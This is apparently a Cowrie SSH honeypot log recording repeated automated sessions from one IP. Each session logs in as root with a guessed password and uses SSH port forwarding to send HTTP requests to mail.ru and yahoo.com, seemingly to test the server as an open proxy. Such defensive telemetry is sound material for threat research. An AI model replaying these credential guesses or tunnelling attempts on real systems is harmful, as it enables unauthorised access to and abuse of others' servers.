{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.570965Z","src_ip":"77.83.207.83","session":"dab19d4d7f47"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.823249Z","src_ip":"77.83.207.83","session":"dab19d4d7f47"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":31536,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:31536","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.874652Z","session":"dab19d4d7f47"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:51.925307Z","src_ip":"77.83.207.83","session":"dab19d4d7f47"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":18535,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:18535","sensor":"my-vps","timestamp":"2025-08-31T03:53:52.068928Z","session":"dab19d4d7f47"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:52.119551Z","src_ip":"77.83.207.83","session":"dab19d4d7f47"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":12356,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:12356","sensor":"my-vps","timestamp":"2025-08-31T03:53:52.265088Z","session":"dab19d4d7f47"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:52.316327Z","src_ip":"77.83.207.83","session":"dab19d4d7f47"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:52.367704Z","src_ip":"77.83.207.83","session":"dab19d4d7f47"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46249,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e9404e3a635","protocol":"ssh","message":"New connection: 77.83.207.83:46249 (1.2.3.4:22) [session: 1e9404e3a635]","sensor":"my-vps","timestamp":"2025-08-31T03:53:52.417009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:52.417901Z","src_ip":"77.83.207.83","session":"1e9404e3a635"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:52.468352Z","src_ip":"77.83.207.83","session":"1e9404e3a635"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:52.720042Z","src_ip":"77.83.207.83","session":"1e9404e3a635"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30761,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:30761","sensor":"my-vps","timestamp":"2025-08-31T03:53:52.771397Z","session":"1e9404e3a635"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:52.822942Z","src_ip":"77.83.207.83","session":"1e9404e3a635"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":21976,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:21976","sensor":"my-vps","timestamp":"2025-08-31T03:53:52.964872Z","session":"1e9404e3a635"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:53.015373Z","src_ip":"77.83.207.83","session":"1e9404e3a635"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":15630,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:15630","sensor":"my-vps","timestamp":"2025-08-31T03:53:53.156930Z","session":"1e9404e3a635"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:53.207306Z","src_ip":"77.83.207.83","session":"1e9404e3a635"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:53.258608Z","src_ip":"77.83.207.83","session":"1e9404e3a635"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46333,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9756c49adb5","protocol":"ssh","message":"New connection: 77.83.207.83:46333 (1.2.3.4:22) [session: d9756c49adb5]","sensor":"my-vps","timestamp":"2025-08-31T03:53:53.307257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:53.316736Z","src_ip":"77.83.207.83","session":"d9756c49adb5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:53.356990Z","src_ip":"77.83.207.83","session":"d9756c49adb5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:53.605043Z","src_ip":"77.83.207.83","session":"d9756c49adb5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28428,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:28428","sensor":"my-vps","timestamp":"2025-08-31T03:53:53.655633Z","session":"d9756c49adb5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:53.705407Z","src_ip":"77.83.207.83","session":"d9756c49adb5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":845,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:845","sensor":"my-vps","timestamp":"2025-08-31T03:53:53.848064Z","session":"d9756c49adb5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:53.897867Z","src_ip":"77.83.207.83","session":"d9756c49adb5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":6902,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6902","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.039984Z","session":"d9756c49adb5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.089804Z","src_ip":"77.83.207.83","session":"d9756c49adb5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.140547Z","src_ip":"77.83.207.83","session":"d9756c49adb5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46426,"dst_ip":"1.2.3.4","dst_port":22,"session":"f493d075a96b","protocol":"ssh","message":"New connection: 77.83.207.83:46426 (1.2.3.4:22) [session: f493d075a96b]","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.189877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.199810Z","src_ip":"77.83.207.83","session":"f493d075a96b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.240507Z","src_ip":"77.83.207.83","session":"f493d075a96b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.491086Z","src_ip":"77.83.207.83","session":"f493d075a96b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15558,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15558","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.543406Z","session":"f493d075a96b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.593678Z","src_ip":"77.83.207.83","session":"f493d075a96b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":1428,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:1428","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.736619Z","session":"f493d075a96b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.786929Z","src_ip":"77.83.207.83","session":"f493d075a96b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":31126,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:31126","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.928505Z","session":"f493d075a96b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:54.978979Z","src_ip":"77.83.207.83","session":"f493d075a96b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.029908Z","src_ip":"77.83.207.83","session":"f493d075a96b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46510,"dst_ip":"1.2.3.4","dst_port":22,"session":"c082b9c516f0","protocol":"ssh","message":"New connection: 77.83.207.83:46510 (1.2.3.4:22) [session: c082b9c516f0]","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.079069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.080091Z","src_ip":"77.83.207.83","session":"c082b9c516f0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.130626Z","src_ip":"77.83.207.83","session":"c082b9c516f0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.380334Z","src_ip":"77.83.207.83","session":"c082b9c516f0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":25861,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:25861","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.431917Z","session":"c082b9c516f0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.482198Z","src_ip":"77.83.207.83","session":"c082b9c516f0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":28392,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28392","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.624404Z","session":"c082b9c516f0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.674713Z","src_ip":"77.83.207.83","session":"c082b9c516f0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":22265,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22265","sensor":"my-vps","timestamp":"2025-08-31T03:53:55.816498Z","session":"c082b9c516f0"}
